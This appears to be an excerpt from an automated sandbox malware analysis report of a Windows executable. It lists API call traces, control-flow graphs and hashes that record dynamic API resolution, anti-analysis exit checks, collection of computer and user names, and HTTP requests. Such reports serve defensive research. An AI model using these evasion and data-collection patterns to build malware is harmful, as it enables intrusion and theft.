calls 27123->27124 27125 9b5301 27124->27125 27126 9d7280 lstrcpy 27125->27126 27127 9b530a 27126->27127 27128 9d7310 3 API calls 27127->27128 27129 9b531f 27128->27129 27130 9d7280 lstrcpy 27129->27130 27131 9b5328 27130->27131 27132 9d72c0 2 API calls 27131->27132 27133 9b533b 27132->27133 27134 9d7280 lstrcpy 27133->27134 27135 9b5344 27134->27135 27136 9b537c 27135->27136 27137 9b5370 lstrcpy 27135->27137 27138 9d72c0 2 API calls 27136->27138 27137->27136 27139 9b538a 27138->27139 27140 9d72c0 2 API calls 27139->27140 27141 9b5397 27140->27141 27142 9d7280 lstrcpy 27141->27142 27143 9b53a1 27142->27143 27144 9b53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27143->27144 27145 9b549c InternetCloseHandle 27144->27145 27149 9b53f2 27144->27149 27147 9b54ae 27145->27147 27146 9b53fd lstrlen 27146->27149 27147->27075 27148 9b542e lstrcpy lstrcat 27148->27149 27149->27145 27149->27146 27149->27148 27150 9b5473 27149->27150 27151 9b546b lstrcpy 27149->27151 27152 9b547a InternetReadFile 27150->27152 27151->27150 27152->27145 27152->27149 27154 9c8cc6 ExitProcess 27153->27154 27169 9c8ccd 27153->27169 27155 9c8ee2 27155->26044 27156 9c8dbd StrCmpCA 27156->27169 27157 9c8ddd StrCmpCA 27157->27169 27158 9c8dfd StrCmpCA 27158->27169 27159 9c8e1d StrCmpCA 27159->27169 27160 9c8e3d StrCmpCA 27160->27169 27161 9c8d5a lstrlen 27161->27169 27162 9c8e56 StrCmpCA 27162->27169 27163 9c8d30 lstrlen 27163->27169 27164 9c8e6f StrCmpCA 27164->27169 27165 9c8e88 lstrlen 27165->27169 27166 9c8d84 StrCmpCA 27166->27169 27167 9c8da4 StrCmpCA 27167->27169 27168 9c8d06 lstrlen 27168->27169 27169->27155 27169->27156 27169->27157 27169->27158 27169->27159 27169->27160 27169->27161 27169->27162 27169->27163 27169->27164 27169->27165 27169->27166 27169->27167 27169->27168 27170 9c8ebb lstrcpy 27169->27170 27170->27169 27171->26050 27172->26052 27173->26058 27174->26060 27175->26066 27176->26068 27177->26074 27178->26078 27179->26084 27180->26086 27181->26090 27182->26104 27183->26108 27184->26107 27185->26103 27186->26107 27187->26125 27188->26110 27189->26111 27190->26115 27191->26121 27192->26122 27193->26128 27194->26135 27195->26137 27196->26161 27197->26165 27198->26164 27199->26160 27200->26164 27201->26174 27204 9b161f 27203->27204 27205 9b162b lstrcpy 27204->27205 27206 9b1633 27204->27206 27205->27206 27207 9b164d lstrcpy 27206->27207 27208 9b1655 27206->27208 27207->27208 27209 9b166f lstrcpy 27208->27209 27210 9b1677 27208->27210 27209->27210 27211 9b1699 27210->27211 27212 9b1691 lstrcpy 27210->27212 27211->26896 27212->27211 27214 9d71e6 27213->27214 27215 9d71fc lstrcpy 27214->27215 27216 9d2860 27214->27216 27215->27216 27216->26039 27218 9b4bd0 27217->27218 27218->27218 27219 9b4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27218->27219 27220 9b4c41 27219->27220 27220->27004 27222 9d3e83 27221->27222 27223 9d3e9f lstrcpy 27222->27223 27224 9d3eab 27222->27224 27223->27224 27225 9d3ecd lstrcpy 27224->27225 27226 9d3ed5 GetSystemTime 27224->27226 27225->27226 27227 9d3ef3 27226->27227 27227->27023 27230 9d732d 27228->27230 27229 9b519b 27232 9d7280 27229->27232 27230->27229 27231 9d733d lstrcpy lstrcat 27230->27231 27231->27229 27233 9d728c 27232->27233 27234 9d72b4 27233->27234 27235 9d72ac lstrcpy 27233->27235 27234->27079 27235->27234 27238 9d72dc 27236->27238 27237 9b51b7 27237->27082 27238->27237 27239 9d72ed lstrcpy lstrcat 27238->27239 27239->27237

                                Executed Functions

                                Function 009B4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B4C7F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4CD2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4D05
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4D35
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4D73
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009B4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: ae13a19c9439de30ece96423360528716376f43f399fe4dfdb5275a6b4a2b342
                                • Instruction ID: dfa8d5f9e61645e2ec6d0b79ea7d9128279d51e0aeb8eb375ca7214ea577e958
                                • Opcode Fuzzy Hash: ae13a19c9439de30ece96423360528716376f43f399fe4dfdb5275a6b4a2b342
                                • Instruction Fuzzy Hash: 90528E319016169BDB21EFA4DE89BEEB7B9EF84320F154424F905BB291DB30EC45CB90
                                Function 009D6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 9d6390-9d63bd GetPEB 2126 9d65c3-9d6623 LoadLibraryA * 5 2125->2126 2127 9d63c3-9d65be call 9d62f0 GetProcAddress * 20 2125->2127 2129 9d6638-9d663f 2126->2129 2130 9d6625-9d6633 GetProcAddress 2126->2130 2127->2126 2132 9d666c-9d6673 2129->2132 2133 9d6641-9d6667 GetProcAddress * 2 2129->2133 2130->2129 2134 9d6688-9d668f 2132->2134 2135 9d6675-9d6683 GetProcAddress 2132->2135 2133->2132 2137 9d66a4-9d66ab 2134->2137 2138 9d6691-9d669f GetProcAddress 2134->2138 2135->2134 2139 9d66ad-9d66d2 GetProcAddress * 2 2137->2139 2140 9d66d7-9d66da 2137->2140 2138->2137 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(77190000,010C1570), ref: 009D63E9
                                • GetProcAddress.KERNEL32(77190000,010C16F0), ref: 009D6402
                                • GetProcAddress.KERNEL32(77190000,010C1648), ref: 009D641A
                                • GetProcAddress.KERNEL32(77190000,010C1510), ref: 009D6432
                                • GetProcAddress.KERNEL32(77190000,010C8B28), ref: 009D644B
                                • GetProcAddress.KERNEL32(77190000,010B5650), ref: 009D6463
                                • GetProcAddress.KERNEL32(77190000,010B54D0), ref: 009D647B
                                • GetProcAddress.KERNEL32(77190000,010C1540), ref: 009D6494
                                • GetProcAddress.KERNEL32(77190000,010C1588), ref: 009D64AC
                                • GetProcAddress.KERNEL32(77190000,010C15B8), ref: 009D64C4
                                • GetProcAddress.KERNEL32(77190000,010C1558), ref: 009D64DD
                                • GetProcAddress.KERNEL32(77190000,010B5370), ref: 009D64F5
                                • GetProcAddress.KERNEL32(77190000,010C1708), ref: 009D650D
                                • GetProcAddress.KERNEL32(77190000,010C15D0), ref: 009D6526
                                • GetProcAddress.KERNEL32(77190000,010B54B0), ref: 009D653E
                                • GetProcAddress.KERNEL32(77190000,010C1720), ref: 009D6556
                                • GetProcAddress.KERNEL32(77190000,010C1528), ref: 009D656F
                                • GetProcAddress.KERNEL32(77190000,010B54F0), ref: 009D6587
                                • GetProcAddress.KERNEL32(77190000,010C1660), ref: 009D659F
                                • GetProcAddress.KERNEL32(77190000,010B53F0), ref: 009D65B8
                                • LoadLibraryA.KERNEL32(010C1678,?,?,?,009D1C03), ref: 009D65C9
                                • LoadLibraryA.KERNEL32(010C15A0,?,?,?,009D1C03), ref: 009D65DB
                                • LoadLibraryA.KERNEL32(010C15E8,?,?,?,009D1C03), ref: 009D65ED
                                • LoadLibraryA.KERNEL32(010C16A8,?,?,?,009D1C03), ref: 009D65FE
                                • LoadLibraryA.KERNEL32(010C1690,?,?,?,009D1C03), ref: 009D6610
                                • GetProcAddress.KERNEL32(76850000,010C1738), ref: 009D662D
                                • GetProcAddress.KERNEL32(77040000,010C1750), ref: 009D6649
                                • GetProcAddress.KERNEL32(77040000,010C1768), ref: 009D6661
                                • GetProcAddress.KERNEL32(75A10000,010C8E40), ref: 009D667D
                                • GetProcAddress.KERNEL32(75690000,010B56D0), ref: 009D6699
                                • GetProcAddress.KERNEL32(776F0000,010C8BF8), ref: 009D66B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 009D66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 009D66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 70f70698ec0c63aac06f91d83738106788259ba3dd990b488426004aaf02d6b3
                                • Instruction ID: d8432121b5dfbcf55e7a68a39ac0374da13ff51101aa163aaeebc3f492b29cef
                                • Opcode Fuzzy Hash: 70f70698ec0c63aac06f91d83738106788259ba3dd990b488426004aaf02d6b3
                                • Instruction Fuzzy Hash: C9A196F5911680DFD754DF65EDC8A2637B9FB883413808919E91ACB362DF34A904DF60
                                Function 009D1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 9d1bf0-9d1c0b call 9b2a90 call 9d6390 2146 9d1c0d 2141->2146 2147 9d1c1a-9d1c27 call 9b2930 2141->2147 2148 9d1c10-9d1c18 2146->2148 2151 9d1c29-9d1c2f lstrcpy 2147->2151 2152 9d1c35-9d1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 9d1c6d-9d1c7b GetSystemInfo 2152->2156 2157 9d1c65-9d1c67 ExitProcess 2152->2157 2158 9d1c7d-9d1c7f ExitProcess 2156->2158 2159 9d1c85-9d1ca0 call 9b1030 call 9b10c0 GetUserDefaultLangID 2156->2159 2164 9d1cb8-9d1cca call 9d2ad0 call 9d3e10 2159->2164 2165 9d1ca2-9d1ca9 2159->2165 2171 9d1ccc-9d1cde call 9d2a40 call 9d3e10 2164->2171 2172 9d1ce7-9d1d06 lstrlen call 9b2930 2164->2172 2165->2164 2166 9d1cb0-9d1cb2 ExitProcess 2165->2166 2171->2172 2185 9d1ce0-9d1ce1 ExitProcess 2171->2185 2177 9d1d08-9d1d0d 2172->2177 2178 9d1d23-9d1d40 lstrlen call 9b2930 2172->2178 2177->2178 2180 9d1d0f-9d1d11 2177->2180 2186 9d1d5a-9d1d7b call 9d2ad0 lstrlen call 9b2930 2178->2186 2187 9d1d42-9d1d44 2178->2187 2180->2178 2183 9d1d13-9d1d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 9d1d7d-9d1d7f 2186->2193 2194 9d1d9a-9d1db4 lstrlen call 9b2930 2186->2194 2187->2186 2188 9d1d46-9d1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2196 9d1d81-9d1d85 2193->2196 2199 9d1dce-9d1deb call 9d2a40 lstrlen call 9b2930 2194->2199 2200 9d1db6-9d1db8 2194->2200 2196->2194 2197 9d1d87-9d1d94 lstrcpy lstrcat 2196->2197 2197->2194 2206 9d1ded-9d1def 2199->2206 2207 9d1e0a-9d1e0f 2199->2207 2200->2199 2201 9d1dba-9d1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 9d1df1-9d1df5 2206->2208 2209 9d1e16-9d1e22 call 9b2930 2207->2209 2210 9d1e11 call 9b2a20 2207->2210 2208->2207 2213 9d1df7-9d1e04 lstrcpy lstrcat 2208->2213 2215 9d1e24-9d1e26 2209->2215 2216 9d1e30-9d1e66 call 9b2a20 * 5 OpenEventA 2209->2216 2210->2209 2213->2207 2215->2216 2217 9d1e28-9d1e2a lstrcpy 2215->2217 2228 9d1e8c-9d1ea0 CreateEventA call 9d1b20 call 9cffd0 2216->2228 2229 9d1e68-9d1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 9d1ea5-9d1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                APIs
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1570), ref: 009D63E9
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C16F0), ref: 009D6402
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1648), ref: 009D641A
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1510), ref: 009D6432
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C8B28), ref: 009D644B
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010B5650), ref: 009D6463
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010B54D0), ref: 009D647B
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1540), ref: 009D6494
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1588), ref: 009D64AC
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C15B8), ref: 009D64C4
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1558), ref: 009D64DD
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010B5370), ref: 009D64F5
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1708), ref: 009D650D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D1C2F
                                • ExitProcess.KERNEL32 ref: 009D1C67
                                • GetSystemInfo.KERNEL32(?), ref: 009D1C71
                                • ExitProcess.KERNEL32 ref: 009D1C7F
                                  • Part of subcall function 009B1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009B1046
                                  • Part of subcall function 009B1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 009B104D
                                  • Part of subcall function 009B1030: ExitProcess.KERNEL32 ref: 009B1058
                                  • Part of subcall function 009B10C0: GlobalMemoryStatusEx.KERNEL32 ref: 009B10EA
                                  • Part of subcall function 009B10C0: ExitProcess.KERNEL32 ref: 009B1114
                                • GetUserDefaultLangID.KERNEL32 ref: 009D1C8F
                                • ExitProcess.KERNEL32 ref: 009D1CB2
                                • ExitProcess.KERNEL32 ref: 009D1CE1
                                • lstrlen.KERNEL32(010C8BE8), ref: 009D1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1D15
                                • lstrcat.KERNEL32(00000000,010C8BE8), ref: 009D1D1D
                                • lstrlen.KERNEL32(009E4B98), ref: 009D1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1D48
                                • lstrcat.KERNEL32(00000000,009E4B98), ref: 009D1D54
                                • lstrlen.KERNEL32(00000000), ref: 009D1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1D94
                                • lstrlen.KERNEL32(009E4B98), ref: 009D1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1DBC
                                • lstrcat.KERNEL32(00000000,009E4B98), ref: 009D1DC8
                                • lstrlen.KERNEL32(00000000), ref: 009D1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1E04
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 652bd6329f6cafd1f3c0f378eae987dc094380d1309ff93f374faa63cea610a6
                                • Instruction ID: d8c516792ab165768eee8461da696f0813c7a2a7d10ecce11bcd30a5d520f079
                                • Opcode Fuzzy Hash: 652bd6329f6cafd1f3c0f378eae987dc094380d1309ff93f374faa63cea610a6
                                • Instruction Fuzzy Hash: 52719432580656BBDB21AFB0DD89B6E377EEF84711F048425F90AAB291DF709C05CB61
                                Function 009B4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 9b4a60-9b4afc RtlAllocateHeap 2867 9b4b7a-9b4bbe VirtualProtect 2850->2867 2868 9b4afe-9b4b03 2850->2868 2869 9b4b06-9b4b78 2868->2869 2869->2867
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B4AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 009B4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: c551e18688f280e881403f24e849df680965e3c240c2a58cc96f541803a91fc3
                                • Instruction ID: 29bee113ea06f93023a6aa4839031fd1ed5e0d2c8abd502f1ebb259111b56d17
                                • Opcode Fuzzy Hash: c551e18688f280e881403f24e849df680965e3c240c2a58cc96f541803a91fc3
                                • Instruction Fuzzy Hash: 4C310A19F802AD768622EBEF4C47F5F6ED5DFC5F68B224076750877182C9A55C00CAE2
                                Function 009D2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2957 9d2ad0-9d2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 9d2b44-9d2b59 2957->2958 2959 9d2b24-9d2b36 2957->2959
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009D2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 009D2B1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 361734184afe5c652b6dff1bed4711ba5e1e0371d27b8d6fd30c6d280606cbfc
                                • Instruction ID: f316863934c304f2596060587385e85eb5f02ca64bd8dc33ed9e66fc006bfefc
                                • Opcode Fuzzy Hash: 361734184afe5c652b6dff1bed4711ba5e1e0371d27b8d6fd30c6d280606cbfc
                                • Instruction Fuzzy Hash: C801D172A44248ABC710DF99EC85BAEF7BCF745B21F00026BF919E3780D77419048BA1
                                Function 009D2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009D2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 009D2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
